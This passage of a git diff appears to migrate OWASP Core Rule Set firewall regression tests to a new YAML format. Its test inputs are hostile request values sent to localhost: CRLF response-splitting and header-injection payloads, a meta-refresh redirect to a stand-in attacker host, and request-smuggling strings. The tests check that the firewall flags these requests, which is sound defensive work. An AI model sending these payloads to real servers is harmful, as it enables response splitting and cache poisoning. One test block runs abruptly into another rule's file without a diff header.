Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index bb265a1fe..da227ce23 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920271.yaml" - description: "Description" +rule_id: 920271 tests: - - test_title: 920271-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%127" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%127" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%03" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%03" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: hi%13=bye - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: hi%13=bye + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%20index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" - - test_title: 920271-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%20index.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920271] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%FFindex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%FFindex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920271] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index 899899fee..96783d5c0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml @@ -1,78 +1,76 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920272.yaml" - description: "Description" +rule_id: 920272 tests: - - test_title: 920272-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%25" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%25" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%80" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%80" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=t%FFest1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/index.html?test=t%FFest1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%35" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920272\"" - - test_title: 920272-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%35" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920272] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/i%FFndex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [200] - log_contains: "id \"920272\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/i%FFndex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 200 + log: + expect_ids: [920272] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index 0589dacc7..981cc1c8a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -1,79 +1,77 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920273.yaml" - description: "Description" +rule_id: 920273 tests: - - test_title: 920273-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920273\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920273] - # the '&' is one of the only symbol allowed - test_title: 920273-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1&test=t" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920273\"" - - test_title: 920273-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1&test=t" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920273] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" - - test_title: 921110-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=budget foo)\n" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921110] + - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/" - data: "var=get it\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=get it\n" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921110] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index cc64c38aa..c7cf96622 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml @@ -1,83 +1,81 @@ --- meta: author: csanders-git, Franziska Bühler - description: None - enabled: true - name: 921120.yaml +rule_id: 921120 tests: - - test_title: 921120-1 + - test_id: 1 desc: HTTP response splitting (921120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam + version: HTTP/1.1 + output: + log: + expect_ids: [921120] + - test_id: 2 desc: "HTTP Response splitting attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" + version: HTTP/1.1 + output: + log: + expect_ids: [921120] + - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" - version: HTTP/1.1 - output: - no_log_contains: id "921120" - - test_title: 921120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [921120] + - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%0d%0aContent-Length: 0" - version: HTTP/1.1 - output: - log_contains: id "921120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%0d%0aContent-Length: 0" + version: HTTP/1.1 + output: + log: + expect_ids: [921120] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 1bd49962f..57318cbb9 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,77 +1,75 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None - enabled: true - name: 921130.yaml +rule_id: 921130 tests: - - test_title: 921130-1 + - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 2 desc: "HTTP Response splitting attack: cookie data" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cookie: "oreo=munchmuch%0d%0a%0d%0a" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cookie: "oreo=munchmuch%0d%0a%0d%0a" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index 94f0d5fe7..224232ba5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml @@ -1,41 +1,40 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921140.yaml" description: "Tests for protocol based attacks" +rule_id: 921140 tests: - - test_title: 921140-1 + - test_id: 1 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" - - test_title: 921140-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921140] + - test_id: 2 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921140] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index 54830c91d..9a57c4427 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml @@ -1,39 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921150.yaml" description: "Tests for protocol based attacks" +rule_id: 921150 tests: - - test_title: 921150-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" - version: "HTTP/1.1" - output: - log_contains: "id \"921150\"" - - test_title: 921150-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" + version: "HTTP/1.1" + output: + log: + expect_ids: [921150] + - test_id: 2 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: GET - uri: "/get?parameter%0d%0a=test" - version: HTTP/1.0 - output: - log_contains: id "921150" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: GET + uri: "/get?parameter%0d%0a=test" + version: HTTP/1.0 + output: + log: + expect_ids: [921150] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml index 189302946..5a9a5f0e6 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml @@ -1,68 +1,67 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "921151.yaml" description: "Tests to trigger or not trigger rule 921151" +rule_id: 921151 tests: - - test_title: 921151-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-1=test%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-1=test%0Dnext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-2=test%0Anext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-2=test%0Anext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-3=test%0A%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-3=test%0A%0Dnext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: '941151-4=test\r\nmore=text' - version: "HTTP/1.1" - output: - no_log_contains: "id \"921151\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: '941151-4=test\r\nmore=text' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921151] diff --git 